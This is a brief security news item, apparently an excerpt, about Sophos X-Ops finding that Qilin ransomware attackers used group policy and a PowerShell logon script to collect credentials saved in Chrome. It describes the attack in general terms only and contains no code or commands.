Qilin ransomware steals login credentials from Chrome
During an investigation into a Qilin ransomware attack, the Sophos X-Ops team found that the attackers were stealing credentials stored in Google Chrome browsers on certain network endpoints. The Qilin group, which has been active for over two years, gained access through compromised credentials and manipulated group policies to run a PowerShell script to collect Chrome credentials. These scripts were activated when users logged in to collect the data. Attackers collect credentials using PowerShell script The cybercriminals used the PowerShell script to collect credentials from networked endpoints and were able to avoid the lack of…